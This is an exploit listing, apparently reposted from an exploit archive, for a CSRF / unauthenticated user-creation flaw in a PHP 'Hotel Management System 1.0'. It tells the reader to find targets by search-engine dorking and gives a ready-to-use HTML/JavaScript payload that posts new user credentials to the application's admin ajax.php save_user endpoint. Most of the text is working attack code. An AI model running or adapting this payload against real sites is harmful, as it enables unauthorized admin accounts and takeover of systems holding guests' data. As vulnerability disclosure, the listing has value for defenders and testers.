Share
## https://sploitus.com/exploit?id=PACKETSTORM:180220
=============================================================================================================================================  
| # Title : Hotel Management System 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] Line 27 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>User Registration</title>  
</head>  
<body>  
  
<h2>User Registration</h2>  
<form id="userForm" enctype="multipart/form-data">  
<label for="username">User Name:</label>  
<input type="username" id="username" name="username" required><br><br>  
  
<label for="password">Password:</label>  
<input type="password" id="password" name="password" required><br><br>  
  
<input type="button" value="Save User" onclick="saveUser()">  
</form>  
  
<script>  
function saveUser() {  
var form = document.getElementById('userForm');  
var formData = new FormData(form);  
  
var xhr = new XMLHttpRequest();  
xhr.open("POST", "http://127.0.0.1/hotel/admin/ajax.php?action=save_user", true);  
  
xhr.onload = function () {  
if (xhr.status === 200) {  
alert('User saved successfully');  
} else {  
alert('An error occurred while saving the user');  
}  
};  
  
xhr.send(formData);  
}  
</script>  
  
</body>  
</html>  
  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================